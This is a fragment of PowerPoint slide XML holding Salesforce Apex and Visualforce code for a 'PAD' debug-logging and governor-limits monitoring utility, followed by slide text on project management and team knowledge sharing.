            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>PAD_log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>message</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>,String</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>valueOf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>reason</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>)));}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>private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String 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Integer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>myFrom,Integer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>myTo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>){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Decimal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>myPercent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>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myTo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" smtClean="0"/>
              <a:t>!=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>0)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>myPercent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>myFrom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" smtClean="0"/>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>0.0)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>myTo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" smtClean="0"/>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>0.0);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>else</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>myPercent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>0;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myPercent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>0.8)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" smtClean="0"/>
              <a:t>return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> 'background-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>color</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>:#B22222;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>color:white;font-weight:bold</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>;';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>else</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" smtClean="0"/>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>myPercent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>0.5)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" smtClean="0"/>
              <a:t>return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> 'background-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>color</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>:#FF7F00;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>color:white;font-weight:bold</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>;';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>else</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" smtClean="0"/>
              <a:t>return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>font-weight:bold</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>;';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</a:t>
            </a:r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dirty="0" err="1" smtClean="0"/>
              <a:t>limits</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>(){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Limits.getAggregateQueries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Limits.getLimitAggregateQueries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>(),'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>AggregateQueries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Limits.getAggregateQueries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Limits.getLimitAggregateQueries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Limits.getCallouts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Limits.getLimitCallouts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>(),'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>Callouts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Limits.getCallouts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Limits.getLimitCallouts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Limits.getDMLRows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Limits.getLimitDMLRows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>(),'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>DMLRows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Limits.getDMLRows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Limits.getLimitDMLRows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Limits.getDMLStatements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Limits.getLimitDMLStatements</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>(),'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>DMLStatements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Limits.getDMLStatements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Limits.getLimitDMLStatements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Limits.getEmailInvocations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Limits.getLimitEmailInvocations</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>(),'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>EmailInvocations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Limits.getEmailInvocations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Limits.getLimitEmailInvocations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Limits.getFieldsDescribes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Limits.getLimitFieldsDescribes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>(),'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>FieldsDescribes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Limits.getFieldsDescribes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Limits.getLimitFieldsDescribes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Limits.getFindSimilarCalls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Limits.getLimitFindSimilarCalls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>(),'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>FindSimilarCalls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Limits.getFindSimilarCalls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Limits.getLimitFindSimilarCalls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Limits.getFutureCalls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Limits.getLimitFutureCalls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>(),'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>FutureCalls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Limits.getFutureCalls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Limits.getLimitFutureCalls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Limits.getHeapSize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Limits.getLimitHeapSize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>(),'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>HeapSize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Limits.getHeapSize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Limits.getLimitHeapSize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Limits.getQueries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Limits.getLimitQueries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>(),'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>Queries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Limits.getQueries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Limits.getLimitQueries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Limits.getPicklistDescribes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Limits.getLimitPicklistDescribes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>(),'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>PicklistDescribes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Limits.getPicklistDescribes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Limits.getLimitPicklistDescribes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Limits.getQueryRows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Limits.getLimitQueryRows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>(),'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>QueryRows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Limits.getQueryRows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Limits.getLimitQueryRows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Limits.getSavepointRollbacks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Limits.getLimitSavepointRollbacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>(),'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>SavepointRollbacks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Limits.getSavepointRollbacks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Limits.getLimitSavepointRollbacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>()));   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Limits.getSavepoints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Limits.getLimitSavepoints</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>(),'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>Savepoints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Limits.getSavepoints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Limits.getLimitSavepoints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Limits.getScriptStatements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Limits.getLimitScriptStatements</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>(),'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>ScriptStatements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Limits.getScriptStatements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Limits.getLimitScriptStatements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       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" smtClean="0"/>
              <a:t>log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Limits.getSoslQueries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" smtClean="0"/>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>' / '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" smtClean="0"/>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>Limits.getLimitSoslQueries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>(),'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>SoslQueries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>',</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>myColor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>Limits.getSoslQueries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>(),</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>Limits.getLimitSoslQueries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>()));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b="1" dirty="0" smtClean="0"/>
              <a:t>public</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> List&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>PAD_log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>getPAD_logs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>(){</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" smtClean="0"/>
              <a:t>return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>PAD_logs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>;}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>static</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>testMethod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>PAD_Main_TestMethod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>(){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>       PAD.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" smtClean="0"/>
              <a:t>log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>('','');PAD.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" smtClean="0"/>
              <a:t>log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>('',1);PAD.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" smtClean="0"/>
              <a:t>log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>(1,'');PAD.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" smtClean="0"/>
              <a:t>log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>(1,1);PAD.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" smtClean="0"/>
              <a:t>log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>(1);PAD.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" smtClean="0"/>
              <a:t>log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>('');</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>PAD.startTimer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>();</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>PAD.stopTimer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>();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limits</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>();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myColor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>(0,0);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>myColor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>(0,3);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>myColor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>(2,3);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>myColor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>(3,3);PAD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>myPAD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" smtClean="0"/>
              <a:t>=new</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> PAD();</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>myPAD.getPAD_logs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>PAD.canTrigger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>('');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dirty="0" smtClean="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Pensées 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4495800" y="1371600"/>
            <a:ext cx="2895600" cy="1752600"/>
          </a:xfrm>
          <a:prstGeom prst="cloudCallou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TIP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Save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this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class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API 23.0 or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you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will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have to push the self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hosted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testmethod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into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a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1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dedicated</a:t>
            </a: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 Class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&lt;PAD Component : Code&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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8" y="1162050"/>
            <a:ext cx="8177212" cy="47053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apex:component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controller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"PAD"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&lt;div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id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'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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PAD_loading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'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en-US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display:none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; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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position:absolute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; left:1px; top:1px;  width:100%;  height:100%; background-color:#888888; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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filter:alpha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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(opacity=50); -moz-opacity:0.5; opacity:0.5;"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&gt;&lt;/div&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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&lt;script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type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text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javascript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function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PAD_lock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(){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document.getElementById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('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PAD_loading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').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style.display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='block';}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function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PAD_unlock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(){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document.getElementById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('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PAD_loading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').</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-F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style.display</a:t>
            </a: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='none';}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&lt;/script&gt;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&lt;style&gt;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.main{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR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text-align:center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;}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&lt;/style&gt;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br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apex:pageBlock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title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"PAD"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rendered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PAD_DebugMode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id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"PAD"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apex:pageBlockTable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PAD_Logs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var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apex:column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"Time"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PAD_Log.timer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width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"150px"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PAD_Log.rowCSS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apex:column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Reason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width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"200px"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PAD_Log.rowCSS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apex:outputText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PAD_Log.reason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escape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"false"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apex:column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apex:column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"Message"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headerClass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PAD_Log.rowCSS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styleClass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"main"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apex:outputText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value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"{!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="10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PAD_Log.message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}"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escape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=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1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"false"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apex:column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apex:pageBlockTable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&gt;&lt;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br</a:t>
            </a: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/&gt;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    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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-F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apex:pageBlock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR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sym typeface="Arial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&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR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apex:component</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR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sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Times New Roman"/>
              <a:sym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000" b="1" dirty="0" smtClean="0"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http://www.cdccharlesbourg.com/img/design/casset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38774"/>
            <a:ext cx="1714500" cy="141922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Consulting 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You as a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>Project Manager</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>How to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t>grow/shrink your team </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>without impact (resource planning and budget management)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Will people joining your team have the same </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t>knowledge</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> as people already developing for a long time on this project ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>How to manage Knowledge through efficient </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t>documentation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> ?</a:t>
            </a:r>
